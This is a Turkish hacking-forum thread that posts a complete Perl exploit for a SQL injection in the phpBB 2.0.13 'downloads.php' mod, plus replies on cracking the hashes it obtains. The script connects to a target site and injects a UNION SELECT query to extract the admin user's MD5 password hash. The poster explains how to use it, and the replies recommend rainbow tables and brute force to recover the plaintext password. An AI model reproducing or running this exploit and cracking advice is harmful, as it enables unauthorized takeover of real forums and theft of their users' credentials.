Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri 
Php Admin Pass.Md5 [ Phpbb 1.13 Down.] Php Admin Pass.Md5 [ Phpbb 1.13 Down.]
-
#!/usr/bin/perl -w
use IO::Socket;
## Example:
## C:\>phpbb.pl www.hack.com /phpBB2/ 2
## /phpBB2/ userid=2
## downloads.php mod in phpBB <= 2.0.13
## **********************************
## [~] Connecting...
## [+] Connected!
## [~] Sending Data...
## [~] Data Sent, Waiting for response...
## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|************************************************* ***************|\n";
print " phpBB <=2.0.13 'downloads.php' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl <site> <folder> <user_id>\n";
print " e.g.: phpbb.pl www.hack.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print "|************************************************* ***************|\n";
print "\n\n";
exit(1);
}
$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB <= 2.0.13\n";
print " **********************************\n";
print " [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print " [+] Connected\n";
print " [~] Sending Data...\n";
$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";
print " [~] Data Sent, Waiting for response...\n";
while ($answer = <$socket>)
{
if ($take == 1) {
$pass = substr($answer,51,32);
print " [+] MD5 Hash for user with id=$user_id is: $pass\n";
$success = 1;
$take = 0;
}
$found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
if ( $found > -1 ) {
$take = 1;
}
}
if ($success==0) {print " [-] Exploit failed\n";}
## EOF ##===========================================================
Çalışma mantığı:
downlands.php den sql e sorgu göndererir..ve attacker admin pass.ı md5 olarak çeker.. scrip kodun admini id numarasını 2 baz alarak sızıyor..
by CYB3R-SPY
-
tamam emeğine sağlık da bu md5 olayı bir ölüm ha elli sene bekle yine çözemiyor direkt şifreyi ereninde olacağını zanetmiyorum ama yine de emeğine sağlık ;)
-
bide perl linki verseydin dai ya
-
Combine bir password 6yı 7yi gectimi bunu md5 kırıcılarla kıramazsın(mümkün fakat suaki donanımınızla ayları yılları alır)
8 Haneli Password u kırmakta ayları yılları alır
Pek fazla umut baglamayın -
1.13 için çok daha iyi exploitler var md5 işe yaramaz
-
Evet mevcut teknolojiyle aylarımızı alır.
-
8 haneli alphanumeric bi md5 hash rainbow table ile 2 dakkada kırılabilir
-
Rainbow table olayı dışında şifrede ascii karakterler yoksa ve fazla uzun değilse biraz sabırla brute yöntemide işe yarayabilir.
-
Arkadaşlar verdiğim yolu tam yaptıktan sonra md5 hash için Rainbow table kullanabilrsiniz..Zor olmyacağını düşünüyorum...
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla